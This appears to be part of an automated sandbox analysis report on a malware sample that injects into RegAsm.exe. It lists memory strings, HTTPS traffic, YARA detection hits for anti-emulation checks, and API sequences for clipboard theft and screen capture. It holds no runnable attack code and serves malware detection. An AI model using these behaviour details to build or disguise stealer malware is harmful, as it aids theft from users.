Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: AKFIDH.2.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: AKFIDH.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EBKJDB.2.dr String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: EBKJDB.2.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: EBKJDB.2.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: EBKJDB.2.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: EBKJDB.2.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: EBKJDB.2.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 9_2_00431530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040FF05 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_0040FF05

System Summary

Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: file.exe, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 176128
Source: KKJEBAAECB.exe.2.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 308224
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 308224
Source: KJKJJJECFI.exe.2.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 176128
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 176128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 2_2_6C0EED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 2_2_6C12B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12B8C0 rand_s,NtQueryVirtualMemory, 2_2_6C12B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 2_2_6C12B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 2_2_6C0CF280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013E0B44 0_2_013E0B44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419CF9 2_2_00419CF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419333 2_2_00419333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00417F83 2_2_00417F83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0C35A0 2_2_6C0C35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C105C10 2_2_6C105C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C112C10 2_2_6C112C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C13AC00 2_2_6C13AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C13542B 2_2_6C13542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0D5440 2_2_6C0D5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C13545C 2_2_6C13545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0D6C80 2_2_6C0D6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1234A0 2_2_6C1234A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12C4A0 2_2_6C12C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0D64C0 2_2_6C0D64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0ED4D0 2_2_6C0ED4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C106CF0 2_2_6C106CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0CD4E0 2_2_6C0CD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0DFD00 2_2_6C0DFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0F0512 2_2_6C0F0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0EED10 2_2_6C0EED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C100DD0 2_2_6C100DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1285F0 2_2_6C1285F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C107E10 2_2_6C107E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C115600 2_2_6C115600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C129E30 2_2_6C129E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C103E50 2_2_6C103E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0E4640 2_2_6C0E4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0E9E50 2_2_6C0E9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C112E4E 2_2_6C112E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C136E63 2_2_6C136E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0CC670 2_2_6C0CC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12E680 2_2_6C12E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0E5E90 2_2_6C0E5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C124EA0 2_2_6C124EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1376E3 2_2_6C1376E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0CBEF0 2_2_6C0CBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0DFEF0 2_2_6C0DFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C107710 2_2_6C107710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0D9F00 2_2_6C0D9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1177A0 2_2_6C1177A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0CDFE0 2_2_6C0CDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0F6FF0 2_2_6C0F6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0D7810 2_2_6C0D7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10B820 2_2_6C10B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C114820 2_2_6C114820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0E8850 2_2_6C0E8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0ED850 2_2_6C0ED850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10F070 2_2_6C10F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0F60A0 2_2_6C0F60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1350C7 2_2_6C1350C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0EC0E0 2_2_6C0EC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1058E0 2_2_6C1058E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0EA940 2_2_6C0EA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C11B970 2_2_6C11B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C13B170 2_2_6C13B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0DD960 2_2_6C0DD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C105190 2_2_6C105190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C122990 2_2_6C122990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0CC9A0 2_2_6C0CC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0FD9B0 2_2_6C0FD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C109A60 2_2_6C109A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C13BA90 2_2_6C13BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C132AB0 2_2_6C132AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0C22A0 2_2_6C0C22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0F4AA0 2_2_6C0F4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0DCAB0 2_2_6C0DCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C108AC0 2_2_6C108AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10E2F0 2_2_6C10E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0E1AF0 2_2_6C0E1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10D320 2_2_6C10D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0C5340 2_2_6C0C5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0DC370 2_2_6C0DC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0CF380 2_2_6C0CF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1353C8 2_2_6C1353C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C24AC30 2_2_6C24AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C236C00 2_2_6C236C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C17AC60 2_2_6C17AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1CECD0 2_2_6C1CECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C16ECC0 2_2_6C16ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F8D20 2_2_6C2F8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C23ED70 2_2_6C23ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C29AD50 2_2_6C29AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C174DB0 2_2_6C174DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C206D90 2_2_6C206D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2FCDC0 2_2_6C2FCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C250E20 2_2_6C250E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C20EE70 2_2_6C20EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1F6E90 2_2_6C1F6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C17AEC0 2_2_6C17AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C210EC0 2_2_6C210EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C176F10 2_2_6C176F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2B0F20 2_2_6C2B0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C232F70 2_2_6C232F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1DEF40 2_2_6C1DEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2B8FB0 2_2_6C2B8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C17EFB0 2_2_6C17EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C24EFF0 2_2_6C24EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C170FE0 2_2_6C170FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1C0820 2_2_6C1C0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1FA820 2_2_6C1FA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C244840 2_2_6C244840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2768E0 2_2_6C2768E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1C6900 2_2_6C1C6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1A8960 2_2_6C1A8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2009A0 2_2_6C2009A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C22A9A0 2_2_6C22A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2309B0 2_2_6C2309B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C28C9E0 2_2_6C28C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1A49F0 2_2_6C1A49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C228A30 2_2_6C228A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C21EA00 2_2_6C21EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1ECA70 2_2_6C1ECA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1EEA80 2_2_6C1EEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C210BA0 2_2_6C210BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C276BE0 2_2_6C276BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1FA430 2_2_6C1FA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1D4420 2_2_6C1D4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C188460 2_2_6C188460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C29A480 2_2_6C29A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1B64D0 2_2_6C1B64D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C20A4D0 2_2_6C20A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C210570 2_2_6C210570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1C8540 2_2_6C1C8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C274540 2_2_6C274540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2B8550 2_2_6C2B8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1D2560 2_2_6C1D2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1645B0 2_2_6C1645B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C23A5E0 2_2_6C23A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1FE5F0 2_2_6C1FE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1CC650 2_2_6C1CC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C20E6E0 2_2_6C20E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1946D0 2_2_6C1946D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1CE6E0 2_2_6C1CE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1F0700 2_2_6C1F0700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C19A7D0 2_2_6C19A7D0
Source: C:\ProgramData\KKJEBAAECB.exe Code function: 6_2_00C50B3A 6_2_00C50B3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043681D 9_2_0043681D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040CC80 9_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040C69D 9_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041E850 9_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043B050 9_2_0043B050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042D056 9_2_0042D056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042285E 9_2_0042285E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00408870 9_2_00408870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00409810 9_2_00409810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00430035 9_2_00430035
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042E8D7 9_2_0042E8D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043E080 9_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004020AD 9_2_004020AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041F8B7 9_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00436150 9_2_00436150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00420970 9_2_00420970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00415172 9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043F9E0 9_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042D9EB 9_2_0042D9EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00408190 9_2_00408190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043D9AD 9_2_0043D9AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004211B0 9_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042C9B7 9_2_0042C9B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00405A40 9_2_00405A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00429A49 9_2_00429A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00426206 9_2_00426206
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042BADA 9_2_0042BADA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042A2DC 9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004122E6 9_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042E2AC 9_2_0042E2AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00420360 9_2_00420360
